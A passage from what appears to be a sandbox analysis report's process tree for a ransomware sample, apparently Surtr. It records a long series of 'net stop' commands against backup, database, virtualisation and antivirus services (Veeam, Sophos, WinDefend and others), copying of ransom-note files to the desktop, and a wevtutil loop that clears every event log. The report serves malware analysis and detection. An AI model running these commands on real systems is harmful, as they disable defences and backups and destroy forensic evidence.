  C:\Windows\system32\cmd.exe /c net stop "SstpSvc"
  2⤵
  PID:3204
- - C:\Windows\system32\net.exe
    net stop "SstpSvc"
    3⤵
    PID:3036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SstpSvc"
      4⤵
      PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "svcGenericHost"
  2⤵
  PID:2988
- - C:\Windows\system32\net.exe
    net stop "svcGenericHost"
    3⤵
    PID:212
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "svcGenericHost"
      4⤵
      PID:2652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "tmlisten"
  2⤵
  PID:3216
- - C:\Windows\system32\net.exe
    net stop "tmlisten"
    3⤵
    PID:2880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "TrueKey"
  2⤵
  PID:204
- - C:\Windows\system32\net.exe
    net stop "TrueKey"
    3⤵
    PID:3220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "TrueKey"
      4⤵
      PID:2304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "UI0Detect"
  2⤵
  PID:3144
- - C:\Windows\system32\net.exe
    net stop "UI0Detect"
    3⤵
    PID:2676
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "UI0Detect"
      4⤵
      PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"
  2⤵
  PID:2536
- - C:\Windows\system32\net.exe
    net stop "VeeamBackupSvc"
    3⤵
    PID:1816
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamBackupSvc"
      4⤵
      PID:2604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"
  2⤵
  PID:1040
- - C:\Windows\system32\net.exe
    net stop "VeeamBrokerSvc"
    3⤵
    PID:3160
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamBrokerSvc"
      4⤵
      PID:236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"
  2⤵
  PID:3228
- - C:\Windows\system32\net.exe
    net stop "VeeamCatalogSvc"
    3⤵
    PID:2648
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamCatalogSvc"
      4⤵
      PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"
  2⤵
  PID:2056
- - C:\Windows\system32\net.exe
    net stop "VeeamCloudSvc"
    3⤵
    PID:548
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamCloudSvc"
      4⤵
      PID:2192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"
  2⤵
  PID:2628
- - C:\Windows\system32\net.exe
    net stop "VeeamDeploymentService"
    3⤵
    PID:2240
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamDeploymentService"
      4⤵
      PID:2072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"
  2⤵
  PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"
  2⤵
  PID:2728
- - C:\Windows\system32\net.exe
    net stop "VeeamEnterpriseManagerSvc"
    3⤵
    PID:1556
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"
      4⤵
      PID:2800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"
  2⤵
  PID:228
- - C:\Windows\system32\net.exe
    net stop "VeeamMountSvc"
    3⤵
    PID:220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamMountSvc"
      4⤵
      PID:2116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"
  2⤵
  PID:1720
- - C:\Windows\system32\net.exe
    net stop "VeeamNFSSvc"
    3⤵
    PID:2684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamNFSSvc"
      4⤵
      PID:2552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"
  2⤵
  PID:1156
- - C:\Windows\system32\net.exe
    net stop "VeeamRESTSvc"
    3⤵
    PID:2476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamRESTSvc"
      4⤵
      PID:2068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"
  2⤵
  PID:2052
- - C:\Windows\system32\net.exe
    net stop "VeeamTransportSvc"
    3⤵
    PID:1472
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamTransportSvc"
      4⤵
      PID:1208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "W3Svc"
  2⤵
  PID:3248
- - C:\Windows\system32\net.exe
    net stop "W3Svc"
    3⤵
    PID:3180
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "W3Svc"
      4⤵
      PID:2760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "wbengine"
  2⤵
  PID:2372
- - C:\Windows\system32\net.exe
    net stop "wbengine"
    3⤵
    PID:1808
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "wbengine"
      4⤵
      PID:1072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "WRSVC"
  2⤵
  PID:1516
- - C:\Windows\system32\net.exe
    net stop "WRSVC"
    3⤵
    PID:2904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WRSVC"
      4⤵
      PID:544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
  2⤵
  PID:2496
- - C:\Windows\system32\net.exe
    net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:1620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:2156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
  2⤵
  PID:2784
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:2560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:3244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"
  2⤵
  PID:3264
- - C:\Windows\system32\net.exe
    net stop "VeeamHvIntegrationSvc"
    3⤵
    PID:3176
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"
      4⤵
      PID:2804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "swi_update"
  2⤵
  PID:2324
- - C:\Windows\system32\net.exe
    net stop "swi_update"
    3⤵
    PID:1300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "swi_update"
      4⤵
      PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"
  2⤵
  PID:3256
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$CXDB"
    3⤵
    PID:3240
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$CXDB"
      4⤵
      PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"
  2⤵
  PID:2108
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$CITRIX_METAFRAME"
    3⤵
    PID:2236
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"
      4⤵
      PID:1604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQL Backups"
  2⤵
  PID:1848
- - C:\Windows\system32\net.exe
    net stop "SQL Backups"
    3⤵
    PID:2152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQL Backups"
      4⤵
      PID:2332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"
  2⤵
  PID:2792
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PROD"
    3⤵
    PID:2624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$PROD"
      4⤵
      PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"
  2⤵
  PID:3312
- - C:\Windows\system32\net.exe
    net stop "Zoolz 2 Service"
    3⤵
    PID:468
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Zoolz 2 Service"
      4⤵
      PID:2724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"
  2⤵
  PID:628
- - C:\Windows\system32\net.exe
    net stop "MSSQLServerADHelper"
    3⤵
    PID:3288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLServerADHelper"
      4⤵
      PID:2656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"
  2⤵
  PID:1648
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PROD"
    3⤵
    PID:1244
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PROD"
      4⤵
      PID:1400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"
  2⤵
  PID:2928
- - C:\Windows\system32\net.exe
    net stop "msftesql$PROD"
    3⤵
    PID:3044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "msftesql$PROD"
      4⤵
      PID:2456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"
  2⤵
  PID:1796
- - C:\Windows\system32\net.exe
    net stop "NetMsmqActivator"
    3⤵
    PID:852
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "NetMsmqActivator"
      4⤵
      PID:3012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "EhttpSrv"
  2⤵
  PID:3296
- - C:\Windows\system32\net.exe
    net stop "EhttpSrv"
    3⤵
    PID:3300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "EhttpSrv"
      4⤵
      PID:1476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ekrn"
  2⤵
  PID:2200
- - C:\Windows\system32\net.exe
    net stop "ekrn"
    3⤵
    PID:1460
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ekrn"
      4⤵
      PID:1536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ESHASRV"
  2⤵
  PID:3328
- - C:\Windows\system32\net.exe
    net stop "ESHASRV"
    3⤵
    PID:1328
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ESHASRV"
      4⤵
      PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"
  2⤵
  PID:1712
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SOPHOS"
    3⤵
    PID:3340
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SOPHOS"
      4⤵
      PID:3164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"
  2⤵
  PID:1632
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SOPHOS"
    3⤵
    PID:3108
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SOPHOS"
      4⤵
      PID:1132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "AVP"
  2⤵
  PID:1900
- - C:\Windows\system32\net.exe
    net stop "AVP"
    3⤵
    PID:3352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "AVP"
      4⤵
      PID:780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "klnagent"
  2⤵
  PID:2736
- - C:\Windows\system32\net.exe
    net stop "klnagent"
    3⤵
    PID:1352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "klnagent"
      4⤵
      PID:3316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"
  2⤵
  PID:3344
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SQLEXPRESS"
    3⤵
    PID:1832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"
      4⤵
      PID:3400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"
  2⤵
  PID:392
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SQLEXPRESS"
    3⤵
    PID:3372
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"
      4⤵
      PID:2788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "wbengine"
  2⤵
  PID:3384
- - C:\Windows\system32\net.exe
    net stop "wbengine"
    3⤵
    PID:1840
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "wbengine"
      4⤵
      PID:1660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "HvHost"
  2⤵
  PID:2132
- - C:\Windows\system32\net.exe
    net stop "HvHost"
    3⤵
    PID:3408
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "HvHost"
      4⤵
      PID:2584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"
  2⤵
  PID:3420
- - C:\Windows\system32\net.exe
    net stop "vmickvpexchange"
    3⤵
    PID:2708
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmickvpexchange"
      4⤵
      PID:2128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"
  2⤵
  PID:1984
- - C:\Windows\system32\net.exe
    net stop "vmicguestinterface"
    3⤵
    PID:1640
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicguestinterface"
      4⤵
      PID:2444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicshutdown"
  2⤵
  PID:1844
- - C:\Windows\system32\net.exe
    net stop "vmicshutdown"
    3⤵
    PID:3392
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicshutdown"
      4⤵
      PID:2448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"
  2⤵
  PID:1664
- - C:\Windows\system32\net.exe
    net stop "vmicheartbeat"
    3⤵
    PID:3364
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicheartbeat"
      4⤵
      PID:3424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmcompute"
  2⤵
  PID:3440
- - C:\Windows\system32\net.exe
    net stop "vmcompute"
    3⤵
    PID:1716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmcompute"
      4⤵
      PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicvmsession"
  2⤵
  PID:3376
- - C:\Windows\system32\net.exe
    net stop "vmicvmsession"
    3⤵
    PID:3412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicvmsession"
      4⤵
      PID:3432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicrdv"
  2⤵
  PID:3452
- - C:\Windows\system32\net.exe
    net stop "vmicrdv"
    3⤵
    PID:3456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicrdv"
      4⤵
      PID:3472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmictimesync"
  2⤵
  PID:3464
- - C:\Windows\system32\net.exe
    net stop "vmictimesync"
    3⤵
    PID:3480
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmictimesync"
      4⤵
      PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicvss"
  2⤵
  PID:3516
- - C:\Windows\system32\net.exe
    net stop "vmicvss"
    3⤵
    PID:3536
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicvss"
      4⤵
      PID:3528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMAuthdService"
  2⤵
  PID:3508
- - C:\Windows\system32\net.exe
    net stop "VMAuthdService"
    3⤵
    PID:3520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMAuthdService"
      4⤵
      PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"
  2⤵
  PID:3580
- - C:\Windows\system32\net.exe
    net stop "VMnetDHCP"
    3⤵
    PID:3584
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMnetDHCP"
      4⤵
      PID:3576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"
  2⤵
  PID:3608
- - C:\Windows\system32\net.exe
    net stop "VMware NAT Service"
    3⤵
    PID:3560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMware NAT Service"
      4⤵
      PID:3548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"
  2⤵
  PID:3640
- - C:\Windows\system32\net.exe
    net stop "VMUSBArbService"
    3⤵
    PID:3644
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMUSBArbService"
      4⤵
      PID:3592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMwareHostd"
  2⤵
  PID:3596
- - C:\Windows\system32\net.exe
    net stop "VMwareHostd"
    3⤵
    PID:3612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sense"
  2⤵
  PID:3680
- - C:\Windows\system32\net.exe
    net stop "Sense"
    3⤵
    PID:3684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sense"
      4⤵
      PID:3664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "WdNisSvc"
  2⤵
  PID:3696
- - C:\Windows\system32\net.exe
    net stop "WdNisSvc"
    3⤵
    PID:3656
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WdNisSvc"
      4⤵
      PID:3672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "WinDefend"
  2⤵
  PID:3720
- - C:\Windows\system32\net.exe
    net stop "WinDefend"
    3⤵
    PID:3724
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WinDefend"
      4⤵
      PID:3688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"
  2⤵
  PID:3808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"
  2⤵
  PID:3860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"
  2⤵
  PID:3892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"
  2⤵
  PID:3840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
  2⤵
  PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe el
    3⤵
    PID:3932
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe el
      4⤵
      PID:3948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3916
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Application"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DebugChannel"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowFilterGraph"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowPluginControl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Els_Hyphenation/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4036
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "EndpointMapper"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "ForwardedEvents"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4084
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "HardwareEvents"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4068
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Internet Explorer"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Key Management Service"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
    3⤵
    PID:3100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Media Center"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2440
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDeviceProxy"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3092
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformance"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPipeline"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPlatform"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2936
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IE/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2368
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1940
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2420
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2244
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:308
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3148
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:2160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    PID:2516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:2540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:2816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:3200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:2808
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
    3⤵
    PID:3204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    PID:212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    PID:2752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    PID:3216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
    3⤵
    PID:3220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    PID:1636
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:3144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:1816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
    3⤵
    PID:2120
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:2648
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:2380
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Backup"
    3⤵
    PID:2056
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:2240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    PID:2188
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:2180
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:1556
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    PID:988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:2684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    PID:2068
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
